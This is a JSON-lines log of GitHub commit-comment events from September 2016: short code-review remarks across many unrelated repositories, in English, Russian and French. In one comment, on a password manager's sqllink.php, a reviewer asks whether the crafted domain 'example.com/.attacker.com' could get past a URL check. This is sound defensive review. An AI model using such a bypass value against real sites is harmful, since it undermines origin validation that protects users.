{"id":"4604345303","type":"CommitCommentEvent","actor":{"login":"kasper93"},"repo":{"name":"mpc-hc/mpc-hc"},"payload":{"comment":{"id":19135172,"position":null,"line":null,"path":null,"commit_id":"fe1b4ebd1ab69109c898fd4aa250013e18d2d116","created_at":"2016-09-22T18:46:31Z","updated_at":"2016-09-22T18:46:31Z","body":"What?"}},"created_at":"2016-09-22T18:46:31Z"}
{"id":"4604345357","type":"CommitCommentEvent","actor":{"login":"hugabor"},"repo":{"name":"Agile-Puppers/Clean-Water"},"payload":{"comment":{"id":19135174,"position":null,"line":null,"path":null,"commit_id":"ada6acd7836091bc5b02e226e37f3ba1da8b1098","created_at":"2016-09-22T18:46:32Z","updated_at":"2016-09-22T18:46:32Z","body":"umm..."}},"created_at":"2016-09-22T18:46:32Z"}
{"id":"4604347828","type":"CommitCommentEvent","actor":{"login":"bshishov"},"repo":{"name":"bshishov/Memorandum"},"payload":{"comment":{"id":19135182,"position":22,"line":22,"path":"main/factories.py","commit_id":"43ebc89740bebd1672d4a3003f4646268f9037b7","created_at":"2016-09-22T18:47:00Z","updated_at":"2016-09-22T18:47:00Z","body":"Это должна быть отдельная RepresentationFactory. Иначе класс многофункциональный получается."}},"created_at":"2016-09-22T18:47:00Z"}
{"id":"4604350473","type":"CommitCommentEvent","actor":{"login":"burgerrg"},"repo":{"name":"cisco/ChezScheme"},"payload":{"comment":{"id":19135188,"position":null,"line":null,"path":null,"commit_id":"15982a28189454d5b7b3b065db5aac9816781bde","created_at":"2016-09-22T18:47:28Z","updated_at":"2016-09-22T18:47:28Z","body":"Thanks for finding this mistake! It should be corrected in the latest commit."}},"created_at":"2016-09-22T18:47:28Z"}
{"id":"4604351376","type":"CommitCommentEvent","actor":{"login":"veronikaslc"},"repo":{"name":"phenotips/phenotips"},"payload":{"comment":{"id":19135190,"position":114,"line":237,"path":"components/pedigree/ui/src/main/resources/PhenoTips/UIX_Field__pedigree.xml","commit_id":"85aa82233de2dca3e371d5185920df7798e603f5","created_at":"2016-09-22T18:47:37Z","updated_at":"2016-09-22T18:47:37Z","body":"Should be: `                                             \"$services.localization.render('phenotips.patientRecord.pedigree.deleteFamilyWarning')\" + \" \" + familyString + \". \" `"}},"created_at":"2016-09-22T18:47:37Z"}
{"id":"4604354303","type":"CommitCommentEvent","actor":{"login":"calda"},"repo":{"name":"Agile-Puppers/Clean-Water"},"payload":{"comment":{"id":19135195,"position":null,"line":null,"path":null,"commit_id":"ada6acd7836091bc5b02e226e37f3ba1da8b1098","created_at":"2016-09-22T18:48:10Z","updated_at":"2016-09-22T18:48:10Z","body":"Rolled in to App class"}},"created_at":"2016-09-22T18:48:10Z"}
{"id":"4604355080","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":19135198,"position":4,"line":7,"path":"index.html","commit_id":"b31bfd002a6b665d4f7d86191036c198b1b312ec","created_at":"2016-09-22T18:48:18Z","updated_at":"2016-09-22T18:48:18Z","body":"http://joxi.ru/xAeLxO5fYo3532"}},"created_at":"2016-09-22T18:48:18Z"}
{"id":"4604355333","type":"CommitCommentEvent","actor":{"login":"ebaydayz"},"repo":{"name":"EpochModTeam/DayZ-Epoch"},"payload":{"comment":{"id":19135200,"position":null,"line":null,"path":null,"commit_id":"6ae64eb622224bf25caed6a6e858488a383b3ffc","created_at":"2016-09-22T18:48:20Z","updated_at":"2016-09-22T18:48:20Z","body":"You don't really need a new list for this. This should cover all base objects:\r\n```sqf\r\n_buildables = DZE_maintainClasses + DZE_LockableStorage + [\"DZ_buildables\",\"DZ_storage_base\"];\r\n```"}},"created_at":"2016-09-22T18:48:20Z"}
{"id":"4604355489","type":"CommitCommentEvent","actor":{"login":"eabatalov"},"repo":{"name":"darkpeaceduck/au-linux-kernel-autumn-2016"},"payload":{"comment":{"id":19135202,"position":9,"line":51,"path":"tasks/linked_lists/module.c","commit_id":"5487c550fd687a830450300d5b3a2f0e675edced","created_at":"2016-09-22T18:48:22Z","updated_at":"2016-09-22T18:48:22Z","body":"Kernel stack size is limited. It is better not to use big stack variables."}},"created_at":"2016-09-22T18:48:22Z"}
{"id":"4604355525","type":"CommitCommentEvent","actor":{"login":"kingthorin"},"repo":{"name":"psiinon/zaproxy"},"payload":{"comment":{"id":19135203,"position":5,"line":30,"path":"src/org/parosproxy/paros/extension/report/ReportLastScan.java","commit_id":"468a699ae52d7cc76ddd6dcd92c62ecbf35135c5","created_at":"2016-09-22T18:48:22Z","updated_at":"2016-09-22T18:48:22Z","body":"Line ending change?  "}},"created_at":"2016-09-22T18:48:22Z"}
{"id":"4604355702","type":"CommitCommentEvent","actor":{"login":"tkurki"},"repo":{"name":"SignalK/specification"},"payload":{"comment":{"id":19135204,"position":null,"line":null,"path":null,"commit_id":"a5ffd17f66e03eab82df9228934967e425881db3","created_at":"2016-09-22T18:48:25Z","updated_at":"2016-09-22T18:48:25Z","body":"Thanks. Add a line to readme instead, please."}},"created_at":"2016-09-22T18:48:25Z"}
{"id":"4604356272","type":"CommitCommentEvent","actor":{"login":"veronikaslc"},"repo":{"name":"phenotips/phenotips"},"payload":{"comment":{"id":19135205,"position":64,"line":294,"path":"components/skin/ui/src/main/resources/PhenoTips/ContentTopMenu.xml","commit_id":"85aa82233de2dca3e371d5185920df7798e603f5","created_at":"2016-09-22T18:48:30Z","updated_at":"2016-09-22T18:48:30Z","body":"Same here"}},"created_at":"2016-09-22T18:48:30Z"}
{"id":"4604362282","type":"CommitCommentEvent","actor":{"login":"Luckymalina"},"repo":{"name":"TouchMate/Technomart"},"payload":{"comment":{"id":19135224,"position":1,"line":1,"path":"css/style.css","commit_id":"b31bfd002a6b665d4f7d86191036c198b1b312ec","created_at":"2016-09-22T18:49:35Z","updated_at":"2016-09-22T18:49:35Z","body":"нужно настроить форматирование в файле, отступы, потому что у меня открылось вот так http://joxi.ru/l2ZXWQeI8pKalr\r\n"}},"created_at":"2016-09-22T18:49:35Z"}
{"id":"4604363566","type":"CommitCommentEvent","actor":{"login":"willchertoff"},"repo":{"name":"HealthAP/hcpd"},"payload":{"comment":{"id":19135229,"position":null,"line":null,"path":null,"commit_id":"47d5138949a7d604712ffe970a67af36d51d3f19","created_at":"2016-09-22T18:49:49Z","updated_at":"2016-09-22T18:49:49Z","body":"We also add remaining CRUD tests for the ```sites``` model "}},"created_at":"2016-09-22T18:49:49Z"}
{"id":"4604363697","type":"CommitCommentEvent","actor":{"login":"icomrade"},"repo":{"name":"EpochModTeam/DayZ-Epoch"},"payload":{"comment":{"id":19135231,"position":null,"line":null,"path":null,"commit_id":"6ae64eb622224bf25caed6a6e858488a383b3ffc","created_at":"2016-09-22T18:49:50Z","updated_at":"2016-09-22T18:49:50Z","body":"Well I needed to exclude floors and select objects that are not in the way, plus it's nice for ease of editing for the server admin."}},"created_at":"2016-09-22T18:49:50Z"}
{"id":"4604365794","type":"CommitCommentEvent","actor":{"login":"ChristianDoucette"},"repo":{"name":"ChristianDoucette/CS-2-Story"},"payload":{"comment":{"id":19135238,"position":1,"line":1,"path":"story.txt","commit_id":"d89dd8facf8f94b33716d1f26102037c969a554b","created_at":"2016-09-22T18:50:13Z","updated_at":"2016-09-22T18:50:13Z","body":"Hi"}},"created_at":"2016-09-22T18:50:13Z"}
{"id":"4604367000","type":"CommitCommentEvent","actor":{"login":"my-instantcms"},"repo":{"name":"instantsoft/icms2"},"payload":{"comment":{"id":19135243,"position":null,"line":null,"path":null,"commit_id":"b2b8fcd94d0e53951e60269d76bb324e77c8f067","created_at":"2016-09-22T18:50:25Z","updated_at":"2016-09-22T18:50:25Z","body":"Кстати об этой папке: \r\nКогда выходить новый коммит, я качаю и загружаю с заменой, если есть изменение в БД, думаю они записываются в файлах этой папки так?\r\nМожно ли как то выполнить этот файл на рабочем сайте? пытался в адресную строку писать site.ru/update/install.php но не получилось"}},"created_at":"2016-09-22T18:50:25Z"}
{"id":"4604370377","type":"CommitCommentEvent","actor":{"login":"eabatalov"},"repo":{"name":"darkpeaceduck/au-linux-kernel-autumn-2016"},"payload":{"comment":{"id":19135250,"position":11,"line":53,"path":"tasks/linked_lists/module.c","commit_id":"5487c550fd687a830450300d5b3a2f0e675edced","created_at":"2016-09-22T18:51:02Z","updated_at":"2016-09-22T18:51:02Z","body":"From task.txt:\r\nНе забывайте, что вы используете глобальный список процессов и на каждой итерации for_each_process вам доступен только текущий процесс и его данные.\r\n\r\nПоэтому ты не можешь сохранять указатель на процесс у себя. Ты им не владеешь. Данные, хранящиеся по нему в любой момент могут быть уничтожены.\r\n\r\nТебе нужно было выделить память для хранения копии каждого имени команды. Эта память уже будет принадлежать тебе."}},"created_at":"2016-09-22T18:51:02Z"}
{"id":"4604371927","type":"CommitCommentEvent","actor":{"login":"sholomc"},"repo":{"name":"sholomc/NewDemo"},"payload":{"comment":{"id":19135254,"position":null,"line":null,"path":null,"commit_id":"5cd39f22f7c4b3d508b0195d68f2c1a0effbbd3a","created_at":"2016-09-22T18:51:20Z","updated_at":"2016-09-22T18:51:20Z","body":"You need to include trace back to the requirements statement"}},"created_at":"2016-09-22T18:51:20Z"}
{"id":"4604373012","type":"CommitCommentEvent","actor":{"login":"hamidadervic"},"repo":{"name":"hamidadervic/bihackasvijeca"},"payload":{"comment":{"id":19135259,"position":null,"line":null,"path":null,"commit_id":"218b9e3ca0725172b4ec55619094d67fd01d5ac8","created_at":"2016-09-22T18:51:33Z","updated_at":"2016-09-22T18:51:33Z","body":"dd"}},"created_at":"2016-09-22T18:51:33Z"}
{"id":"4604374449","type":"CommitCommentEvent","actor":{"login":"hugabor"},"repo":{"name":"Agile-Puppers/Clean-Water"},"payload":{"comment":{"id":19135262,"position":null,"line":null,"path":null,"commit_id":"ada6acd7836091bc5b02e226e37f3ba1da8b1098","created_at":"2016-09-22T18:51:48Z","updated_at":"2016-09-22T18:51:48Z","body":"but your commit doesn't compile. App.java isn't changed. maybe you left out App.java from your commit?"}},"created_at":"2016-09-22T18:51:48Z"}
{"id":"4604377186","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19135270,"position":7,"line":39,"path":"src/SkirtBrim.cpp","commit_id":"0b4eda9592d2025b8461524eb4562013160eb82b","created_at":"2016-09-22T18:52:19Z","updated_at":"2016-09-22T18:52:19Z","body":"made constexpr.."}},"created_at":"2016-09-22T18:52:19Z"}
{"id":"4604378018","type":"CommitCommentEvent","actor":{"login":"fuzegit"},"repo":{"name":"instantsoft/icms2"},"payload":{"comment":{"id":19135271,"position":null,"line":null,"path":null,"commit_id":"b2b8fcd94d0e53951e60269d76bb324e77c8f067","created_at":"2016-09-22T18:52:28Z","updated_at":"2016-09-22T18:52:28Z","body":"Это пакет обновления без папки package. Изменения то записываются, но их нужно выполнить ведь. Соберите пакет из этой папки и установите стандартным способом."}},"created_at":"2016-09-22T18:52:28Z"}
{"id":"4604378950","type":"CommitCommentEvent","actor":{"login":"calda"},"repo":{"name":"Agile-Puppers/Clean-Water"},"payload":{"comment":{"id":19135275,"position":null,"line":null,"path":null,"commit_id":"ada6acd7836091bc5b02e226e37f3ba1da8b1098","created_at":"2016-09-22T18:52:39Z","updated_at":"2016-09-22T18:52:39Z","body":"Uh oh that's not supposed to happen. Will investigate"}},"created_at":"2016-09-22T18:52:39Z"}
{"id":"4604379626","type":"CommitCommentEvent","actor":{"login":"sompylasar"},"repo":{"name":"mzhurovich/Current"},"payload":{"comment":{"id":19135277,"position":65,"line":116,"path":"Karl/integrations/nodejs/test.js","commit_id":"1e136f702c1e0134b328dcbff65c310011eedece","created_at":"2016-09-22T18:52:46Z","updated_at":"2016-09-22T18:52:46Z","body":"assert for service.currently object"}},"created_at":"2016-09-22T18:52:46Z"}
{"id":"4604382678","type":"CommitCommentEvent","actor":{"login":"Tee7even"},"repo":{"name":"minecrafter/voxelwind"},"payload":{"comment":{"id":19135283,"position":5,"line":126,"path":"api/src/main/java/com/voxelwind/api/server/event/block/BlockReplaceEvent.java","commit_id":"fe8d1cebd2aa3a61216b81524f39d76aea5ac99d","created_at":"2016-09-22T18:53:18Z","updated_at":"2016-09-22T18:53:18Z","body":"I'm not talking only about \"Cancellable\", as I said any way to not repeat\nthe same code would be nice.\n\n22 сент. 2016 г. 22:30 пользователь \"Tux\" <notifications@github.com>\nнаписал:\n\n> Cancellable is useful *only* for binary \"cancelled\" states. It is not\n> appropriate in all cases.\n>\n> Here's my justification for not using Cancellable:\n>\n>    - Some events are *conditionally* cancellable. Look at PlayerLoginEvent\n>    for an example. It would be invalid to have a cancelled event without a\n>    reason.\n>    - Some events may have more than one result. I do not have any\n>    examples for this one yet, however thanks to the event system's flexibility\n>    I can add one.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/minecrafter/voxelwind/commit/fe8d1cebd2aa3a61216b81524f39d76aea5ac99d#commitcomment-19134890>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AGc0WqV0OThz6vHHIrsz7RwB8iH-0S2Vks5qsslIgaJpZM4KCwZ->\n> .\n>\n"}},"created_at":"2016-09-22T18:53:18Z"}
{"id":"4604386554","type":"CommitCommentEvent","actor":{"login":"sompylasar"},"repo":{"name":"mzhurovich/Current"},"payload":{"comment":{"id":19135296,"position":null,"line":null,"path":null,"commit_id":"1e136f702c1e0134b328dcbff65c310011eedece","created_at":"2016-09-22T18:54:00Z","updated_at":"2016-09-22T18:54:00Z","body":":+1: LGTM"}},"created_at":"2016-09-22T18:54:00Z"}
{"id":"4604386621","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":19135298,"position":null,"line":null,"path":null,"commit_id":"6c556a3257a1ae101a5a16b56895838c0a165a4e","created_at":"2016-09-22T18:54:01Z","updated_at":"2016-09-22T18:54:01Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 256](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1217&buildTypeId=Xbim_XbimGeometry_XbimGeometry) is now running\n"}},"created_at":"2016-09-22T18:54:01Z"}
{"id":"4604389288","type":"CommitCommentEvent","actor":{"login":"androom"},"repo":{"name":"androom/CS-2-Story"},"payload":{"comment":{"id":19135304,"position":null,"line":null,"path":null,"commit_id":"816ee4b37aa13e1d933ce738612dd5f009666dbe","created_at":"2016-09-22T18:54:31Z","updated_at":"2016-09-22T18:54:31Z","body":"lmao"}},"created_at":"2016-09-22T18:54:31Z"}
{"id":"4604390463","type":"CommitCommentEvent","actor":{"login":"pawaitemadisoncollege"},"repo":{"name":"MadJavaEntFall2016/santa-in-an-elevator-week-2-exercise-1-jadecristal"},"payload":{"comment":{"id":19135307,"position":129,"line":129,"path":"src/test/java/edu/madisoncollege/entjava/TestSantaInAnElevator.java","commit_id":"31e846ff460992003b6806eb5689f0dbb07d9deb","created_at":"2016-09-22T18:54:43Z","updated_at":"2016-09-22T18:54:43Z","body":"Nice through testing! I'm not sure what your question is here on 129. Please give me a little more detail and I'll do my best to answer."}},"created_at":"2016-09-22T18:54:43Z"}
{"id":"4604390481","type":"CommitCommentEvent","actor":{"login":"androom"},"repo":{"name":"androom/CS-2-Story"},"payload":{"comment":{"id":19135308,"position":null,"line":null,"path":null,"commit_id":"816ee4b37aa13e1d933ce738612dd5f009666dbe","created_at":"2016-09-22T18:54:43Z","updated_at":"2016-09-22T18:54:43Z","body":"You're so funny"}},"created_at":"2016-09-22T18:54:43Z"}
{"id":"4604391719","type":"CommitCommentEvent","actor":{"login":"sholomc"},"repo":{"name":"sholomc/NewDemo"},"payload":{"comment":{"id":19135311,"position":null,"line":null,"path":null,"commit_id":"cb480dac52fe010cdf010efea7f79f9366f0319a","created_at":"2016-09-22T18:54:56Z","updated_at":"2016-09-22T18:54:56Z","body":"Great job"}},"created_at":"2016-09-22T18:54:56Z"}
{"id":"4604394120","type":"CommitCommentEvent","actor":{"login":"sridharkaza"},"repo":{"name":"employmeo/employmeo"},"payload":{"comment":{"id":19135315,"position":null,"line":null,"path":null,"commit_id":"de12ea2f13c26d699ca04d99b55e5aa8cad8007f","created_at":"2016-09-22T18:55:21Z","updated_at":"2016-09-22T18:55:21Z","body":"Issue #17 "}},"created_at":"2016-09-22T18:55:21Z"}
{"id":"4604395885","type":"CommitCommentEvent","actor":{"login":"bfrggit"},"repo":{"name":"vmware/liota"},"payload":{"comment":{"id":19135323,"position":67,"line":87,"path":"packages/examples/graphite_system_stats.py","commit_id":"6b38359ba67e59c236ee4d71dce3984e00b9dc9b","created_at":"2016-09-22T18:55:35Z","updated_at":"2016-09-22T18:55:35Z","body":"CPU_Process is a metric on the gateway, CPU.process sounds like a metric \"Process\" on device \"CPU\" because in graphite we are using dot (\".\") to represent gateway/device relationship.\r\n\r\nI am not sure if we need to change this, but please make sure we think carefully and make it consistent across all graphite apps/packages."}},"created_at":"2016-09-22T18:55:35Z"}
{"id":"4604396273","type":"CommitCommentEvent","actor":{"login":"sridharkaza"},"repo":{"name":"employmeo/employmeo"},"payload":{"comment":{"id":19135325,"position":null,"line":null,"path":null,"commit_id":"ce3ac7a323289a2f33ed34a6252d4a2120d4bc9d","created_at":"2016-09-22T18:55:39Z","updated_at":"2016-09-22T18:55:39Z","body":"#17"}},"created_at":"2016-09-22T18:55:39Z"}
{"id":"4604399281","type":"CommitCommentEvent","actor":{"login":"zeruniverse"},"repo":{"name":"zeruniverse/Password-Manager"},"payload":{"comment":{"id":19135331,"position":5,"line":44,"path":"src/function/sqllink.php","commit_id":"dfff00a8a137304dd8cbdef5d32f6e45463ddfc6","created_at":"2016-09-22T18:56:13Z","updated_at":"2016-09-22T18:56:13Z","body":"Didn't I check \"http://example.com/\"? Can you have a domain \"example.com/.attacker.com\"?"}},"created_at":"2016-09-22T18:56:13Z"}
{"id":"4604404744","type":"CommitCommentEvent","actor":{"login":"utkbansal"},"repo":{"name":"Software-Incubator/Recruitment"},"payload":{"comment":{"id":19135348,"position":4,"line":5,"path":"Exam_portal/excel_creator.py","commit_id":"cee318a98032a74a3419a557a1df7e538e7d3b18","created_at":"2016-09-22T18:57:12Z","updated_at":"2016-09-22T18:57:12Z","body":"Camel case for function names. _Seriously?_"}},"created_at":"2016-09-22T18:57:12Z"}
{"id":"4604406529","type":"CommitCommentEvent","actor":{"login":"shunshou"},"repo":{"name":"ucb-bar/firrtl"},"payload":{"comment":{"id":19135352,"position":21,"line":253,"path":"src/main/scala/firrtl/passes/AnnotateValidMemConfigs.scala","commit_id":"99e625ca4f572664e0f49abe34273fdb0bca0659","created_at":"2016-09-22T18:57:32Z","updated_at":"2016-09-22T18:57:32Z","body":"Ok, I'll do that. "}},"created_at":"2016-09-22T18:57:32Z"}
{"id":"4604407708","type":"CommitCommentEvent","actor":{"login":"nikmash"},"repo":{"name":"ironbay/bot"},"payload":{"comment":{"id":19135355,"position":22,"line":22,"path":"lib/skill/joke.ex","commit_id":"18fc899cca4541acefb7aed889d63f9eba491b09","created_at":"2016-09-22T18:57:45Z","updated_at":"2016-09-22T18:57:45Z","body":"bots have no emotion."}},"created_at":"2016-09-22T18:57:45Z"}
{"id":"4604409543","type":"CommitCommentEvent","actor":{"login":"my-instantcms"},"repo":{"name":"instantsoft/icms2"},"payload":{"comment":{"id":19135358,"position":null,"line":null,"path":null,"commit_id":"b2b8fcd94d0e53951e60269d76bb324e77c8f067","created_at":"2016-09-22T18:58:04Z","updated_at":"2016-09-22T18:58:04Z","body":"Понял, спасибо"}},"created_at":"2016-09-22T18:58:04Z"}
{"id":"4604422338","type":"CommitCommentEvent","actor":{"login":"philmmanjaro"},"repo":{"name":"manjaro/manjaro-tools"},"payload":{"comment":{"id":19135389,"position":6,"line":459,"path":"lib/util.sh","commit_id":"5b780579b6bacb6d1faa407eb32819eece53446b","created_at":"2016-09-22T19:00:19Z","updated_at":"2016-09-22T19:00:19Z","body":"Why is this now hardcoded and not adjustable by a profile.conf?"}},"created_at":"2016-09-22T19:00:19Z"}
{"id":"4604424771","type":"CommitCommentEvent","actor":{"login":"bfrggit"},"repo":{"name":"vmware/liota"},"payload":{"comment":{"id":19135395,"position":5,"line":58,"path":"packages/liotapkg.sh","commit_id":"6b38359ba67e59c236ee4d71dce3984e00b9dc9b","created_at":"2016-09-22T19:00:45Z","updated_at":"2016-09-22T19:00:45Z","body":"According to Linux folder definitions, e.g. http://www.tldp.org/LDP/Linux-Filesystem-Hierarchy/html/the-root-directory.html, `/etc` is **not** the correct place to put this FIFO file.\r\n\r\nIn the old liota, this file was in `var`. I think `var` or `tmp` is better.\r\n\r\nWhat's more, why should we even have this line here in this file? This file is designed to read this path from `liota.conf` I think... Please have a look at the previous version here in my fork: https://github.com/bfrggit/liota/blob/master/aux/liotapkg.sh."}},"created_at":"2016-09-22T19:00:45Z"}
{"id":"4604425086","type":"CommitCommentEvent","actor":{"login":"ebaydayz"},"repo":{"name":"EpochModTeam/DayZ-Epoch"},"payload":{"comment":{"id":19135396,"position":null,"line":null,"path":null,"commit_id":"6ae64eb622224bf25caed6a6e858488a383b3ffc","created_at":"2016-09-22T19:00:47Z","updated_at":"2016-09-22T19:00:47Z","body":"Floors can be banked at 45 and 90 degrees now, so they can act as walls.\r\n\r\nI don't see why anyone would want to edit this list. You shouldn't be able to drag an unconscious player through any base object. If an admin adds more base objects they will most likely add them to MaintainClasses or at least SafeObjects.\r\n\r\nIt's not a big deal if you can't drag a player within 3m of any base object. People don't use that feature much anyways. Exploiting it to get in bases is more game breaking."}},"created_at":"2016-09-22T19:00:47Z"}
{"id":"4604431185","type":"CommitCommentEvent","actor":{"login":"magicrub"},"repo":{"name":"ArduPilot/MissionPlanner"},"payload":{"comment":{"id":19135413,"position":null,"line":null,"path":null,"commit_id":"1b91ae21e240f20739dfeaa88172961338838621","created_at":"2016-09-22T19:01:51Z","updated_at":"2016-09-22T19:01:51Z","body":"Looks good to me"}},"created_at":"2016-09-22T19:01:51Z"}
{"id":"4604438117","type":"CommitCommentEvent","actor":{"login":"benbuckman"},"repo":{"name":"Shyp/shyp-toolkit"},"payload":{"comment":{"id":19135432,"position":18,"line":18,"path":"initiate","commit_id":"e9bfcfc06044fbc1a94aab8a5edc0a1b96d7abe7","created_at":"2016-09-22T19:03:08Z","updated_at":"2016-09-22T19:03:08Z","body":"@dylanpyle Can you remind me what this is for – this error is consistently appearing in CI (`mv: cannot stat ‘/app/.ssh/config’: No such file or directory`), do we want that? In what environment does it not fail?\r\nThanks\r\n(cc @chelsey )"}},"created_at":"2016-09-22T19:03:08Z"}
{"id":"4604438465","type":"CommitCommentEvent","actor":{"login":"eabatalov"},"repo":{"name":"darkpeaceduck/au-linux-kernel-autumn-2016"},"payload":{"comment":{"id":19135433,"position":22,"line":64,"path":"tasks/linked_lists/module.c","commit_id":"5487c550fd687a830450300d5b3a2f0e675edced","created_at":"2016-09-22T19:03:11Z","updated_at":"2016-09-22T19:03:11Z","body":"You call list_del two times here. This is buggy code. It shouldn't be called 2 times."}},"created_at":"2016-09-22T19:03:11Z"}
{"id":"4604439616","type":"CommitCommentEvent","actor":{"login":"eabatalov"},"repo":{"name":"darkpeaceduck/au-linux-kernel-autumn-2016"},"payload":{"comment":{"id":19135436,"position":23,"line":18,"path":"tasks/linked_lists/stack.c","commit_id":"5487c550fd687a830450300d5b3a2f0e675edced","created_at":"2016-09-22T19:03:25Z","updated_at":"2016-09-22T19:03:25Z","body":"This should only kfree()"}},"created_at":"2016-09-22T19:03:25Z"}
{"id":"4604441332","type":"CommitCommentEvent","actor":{"login":"JabX"},"repo":{"name":"JabX/autofocus"},"payload":{"comment":{"id":19135439,"position":null,"line":null,"path":null,"commit_id":"505dd5b8e5efeb40b4d2819fb22f3394c62b59c6","created_at":"2016-09-22T19:03:46Z","updated_at":"2016-09-22T19:03:46Z","body":"Ouais mais non, si tu fais ça, tu va rendre, pour une URL genre `/:a/:b/:c`, l'URL de la vue `{a: \"a\", b: \"b\"}` équivalente à celle de la vue {a: \"a\", c: \"b\"} si tu saute le paramètre non renseigné. Oups.\r\n\r\nJ'y avais un peu réfléchi et j'avais délibérément fait ça, après c'est vrai que les `//` seront aplatis en `/` du côté URL -> vue, du coup on ne peut pas sauter de paramètres.\r\n\r\nJe vais changer le `currentPath` pour qu'il te pète à la gueule si tu laisse des paramètres vides, genre tu ne peux pas changer l'état de la vue si ça amène à une URL à laquelle il manque un paramètre."}},"created_at":"2016-09-22T19:03:46Z"}
{"id":"4604442716","type":"CommitCommentEvent","actor":{"login":"cdv-dev"},"repo":{"name":"CrossMiron/Todo-App"},"payload":{"comment":{"id":19135441,"position":27,"line":27,"path":"app/build.gradle","commit_id":"c63dd7d05691e190a8ebd1bc78b4bf7f9df0a4a6","created_at":"2016-09-22T19:04:00Z","updated_at":"2016-09-22T19:04:00Z","body":"why did you add this? "}},"created_at":"2016-09-22T19:04:00Z"}
{"id":"4604444251","type":"CommitCommentEvent","actor":{"login":"sompylasar"},"repo":{"name":"mzhurovich/Current"},"payload":{"comment":{"id":19135447,"position":53,"line":85,"path":"Karl/integrations/nodejs/claire.js","commit_id":"1e136f702c1e0134b328dcbff65c310011eedece","created_at":"2016-09-22T19:04:17Z","updated_at":"2016-09-22T19:04:17Z","body":"There are no private **methods** in JavaScript. There are functions that may access variables from the outer scope. There is a convention to mark methods (function properties) as private by prefixing or suffixing their names with underscore, no matter where they are created: per prototype during module run or per instance in a constructor. You may create all the functions that need to access private variables for each instance, but this has no practical sense."}},"created_at":"2016-09-22T19:04:17Z"}
{"id":"4604445529","type":"CommitCommentEvent","actor":{"login":"cdv-dev"},"repo":{"name":"CrossMiron/Todo-App"},"payload":{"comment":{"id":19135455,"position":29,"line":29,"path":"app/build.gradle","commit_id":"c63dd7d05691e190a8ebd1bc78b4bf7f9df0a4a6","created_at":"2016-09-22T19:04:30Z","updated_at":"2016-09-22T19:04:30Z","body":"why did you add \"ads\"?"}},"created_at":"2016-09-22T19:04:30Z"}
{"id":"4604446235","type":"CommitCommentEvent","actor":{"login":"ChristianDoucette"},"repo":{"name":"dylantorrance/CS-2-Story"},"payload":{"comment":{"id":19135456,"position":null,"line":null,"path":null,"commit_id":"df271b3ecaa1d10927bd260d7c6977ba72a10b65","created_at":"2016-09-22T19:04:38Z","updated_at":"2016-09-22T19:04:38Z","body":"this i a garbge sory"}},"created_at":"2016-09-22T19:04:38Z"}
{"id":"4604446698","type":"CommitCommentEvent","actor":{"login":"shabbir12hasan"},"repo":{"name":"shabbir12hasan/hasanshabbirWeb"},"payload":{"comment":{"id":19135457,"position":null,"line":null,"path":null,"commit_id":"9bf66843beb3ccaa6158770753a9e707717862d6","created_at":"2016-09-22T19:04:44Z","updated_at":"2016-09-22T19:04:44Z","body":"Test added"}},"created_at":"2016-09-22T19:04:44Z"}
{"id":"4604447288","type":"CommitCommentEvent","actor":{"login":"cdv-dev"},"repo":{"name":"CrossMiron/Todo-App"},"payload":{"comment":{"id":19135458,"position":30,"line":30,"path":"app/build.gradle","commit_id":"c63dd7d05691e190a8ebd1bc78b4bf7f9df0a4a6","created_at":"2016-09-22T19:04:50Z","updated_at":"2016-09-22T19:04:50Z","body":"and \"maps\" ?"}},"created_at":"2016-09-22T19:04:50Z"}
{"id":"4604448598","type":"CommitCommentEvent","actor":{"login":"ChristianDoucette"},"repo":{"name":"occam98/CS-2-Story"},"payload":{"comment":{"id":19135461,"position":null,"line":null,"path":null,"commit_id":"cf9f37703fdde1c375569cbdb4351488e1c517c3","created_at":"2016-09-22T19:05:07Z","updated_at":"2016-09-22T19:05:07Z","body":"Its me"}},"created_at":"2016-09-22T19:05:07Z"}
{"id":"4604451048","type":"CommitCommentEvent","actor":{"login":"shabbir12hasan"},"repo":{"name":"shabbir12hasan/hasanshabbirWeb"},"payload":{"comment":{"id":19135464,"position":5,"line":9,"path":"index.html","commit_id":"9bf66843beb3ccaa6158770753a9e707717862d6","created_at":"2016-09-22T19:05:33Z","updated_at":"2016-09-22T19:05:33Z","body":"Test added"}},"created_at":"2016-09-22T19:05:33Z"}
{"id":"4604451290","type":"CommitCommentEvent","actor":{"login":"Bjvanminnen"},"repo":{"name":"code-dot-org/code-dot-org"},"payload":{"comment":{"id":19135465,"position":14,"line":45,"path":"apps/src/tutorialExplorer/tutorialSet.jsx","commit_id":"20fc0890930c13381fd156a6da24f7de3b98c416","created_at":"2016-09-22T19:05:36Z","updated_at":"2016-09-22T19:05:36Z","body":"If you want to be extra fancy, you can even do \r\n```\r\nfilterTutorials(tutorials, { locale, specificLocale, filters }) {\r\n```\r\nI'm not entirely sure whether or not I prefer this \"extra fancy\" approach."}},"created_at":"2016-09-22T19:05:36Z"}
{"id":"4604451869","type":"CommitCommentEvent","actor":{"login":"ob7"},"repo":{"name":"concrete5/concrete5"},"payload":{"comment":{"id":19135467,"position":4,"line":14,"path":"concrete/src/Page/Stack/Stack.php","commit_id":"3c038d80d62e32078905b9e904494d748cd66d71","created_at":"2016-09-22T19:05:42Z","updated_at":"2016-09-22T19:05:42Z","body":"This line is missing the ending semicolon."}},"created_at":"2016-09-22T19:05:42Z"}
{"id":"4604452604","type":"CommitCommentEvent","actor":{"login":"shabbir12hasan"},"repo":{"name":"shabbir12hasan/hasanshabbirWeb"},"payload":{"comment":{"id":19135470,"position":null,"line":null,"path":null,"commit_id":"9bf66843beb3ccaa6158770753a9e707717862d6","created_at":"2016-09-22T19:05:49Z","updated_at":"2016-09-22T19:05:49Z","body":"done"}},"created_at":"2016-09-22T19:05:49Z"}
